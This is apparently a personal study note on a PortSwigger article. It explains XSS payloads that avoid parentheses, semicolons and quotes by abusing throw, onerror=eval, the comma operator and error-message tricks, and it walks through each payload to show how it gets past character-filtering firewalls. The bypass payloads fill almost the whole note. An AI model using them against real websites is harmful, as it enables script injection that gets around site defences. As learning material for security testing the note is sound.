https://portswigger.net/research/xss-without-parentheses-and-semi-colons

Some website use WAF to restrict character allow to use. You need other way to bypass, one of it is to use 'throw' statement with an exception handler (enable pass argument to function without using parentheses)
    Example:
        Block ()
            <script>onerror=alert;throw 1337</script>
                + window.onerror = function(message, source, lineno, colno, error) { ... }
                + throw 1337 -> window.onerror is called with message = 1337 ("Uncaught 1337" in chrome)
                => onerror=alert -> window.onerror = alert(message) -> alert(1337) 
        Block ();       
            <script>{onerror=alert}throw 1337</script>
                + {...} is block statement, block scope
                -> can do this without ;
        Block ();
            <script>throw onerror=alert,'some string',123,'haha'</script>
                + comma operator (,) execute from left->right but only return last value
                + onerror=alert + return 'haha'
                => alert('haha')
        Block ();
            <script>{onerror=eval}throw'=alert\x281337\x29'</script>        
                    (not work in firefox because of prefix "Uncaught exception")
                -> onerror=eval + throw '=alert(1337)'
                -> eval("Uncaught=alert(1337)") and browser return Uncaught
                -> trigger alert(1337)
        Firefox bypass
            <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
                + throw new Error("hello") -> Error: hello
                    throw "hello" -> uncaught exception: hello
                + But can call "new Error()" because of block ()
                + We can replace by calling plain object has same property as Error
                    {
                        lineNumber: 1,
                        columnNumber: 1,
                        fileName: 1,
                        message: 'alert\x281\x29'
                    }
                + Firefox look at this and think that it's look like Error object
                -> Execute it like Error
                + Use Hackability Inspector to check property of new Error()
                    https://portswigger-labs.net/hackability/inspector/?input=new%20Error(%27blah%27)             
        Seoncd argument 
            <script>{onerror=prompt}throw{lineNumber:1,columnNumber:1,fileName:'second argument',message:'first argument'}</script>
                + prompt('first argument', 'second argument', 1, 1)
                + But prompt only need 2 argument prompt(message, default)
        Block () ; " '
            <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
                + This payload using comma operator, execute left->right but only return last
                + Uncaught = 1
                + g = alert
                + a = URL + 0 = "function URL() { [native code] }0"
                    -> URL -> function URL() { [native code] }
                    -> URL + 0 = "function URL() { [native code] }" + "0"
                    -> a[12] = '(';     a[13] = ')'
                + onerror = eval
                + /1/g + a[12] + [1337] + a[13] = "/1/g(1337)"
                    -> /1/g + "" = "/1/g"
                    -> "/1/g" + "(" + "1337" + ")"
                -> throw "/1/g(1337)"
                -> eval("Uncaught /1/g(1337)")  (Chrome behavior)
                -> 1 / 1 / alert(1337)  (Divisor trigger error, but alert executed)
                -> alert(1337)
        Block throw function
            <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
                + TypeError.prototype.name = '=/'
                    + Default: TypeError.prototype.name === "TypeError"
                            <error.name>: <error.message>
                    + TypeError: Cannot read properties of undefined
                    -> =/: Cannot read properties of undefined
                + 0[onerror=eval] -> undefined
                    + 0[eval] same as (0)["function eval() { [native code] }"]
                    (Because eval.toString() = "function eval() { [native code] }")
                + (0[onerror=eval])['/-alert(1)//']
                    + =/: Cannot read properties of undefined (reading '/-alert(1)//')
                -> Trigger onerror=eval
                -> eval("=/: Cannot read properties of undefined (reading '/-alert(1)//')")
                    "/: Cannot read properties of undefined (reading '/"  Comment
                    -alert(1)//')
                -> =/.../-alert(1)//
                -> Trigger XSS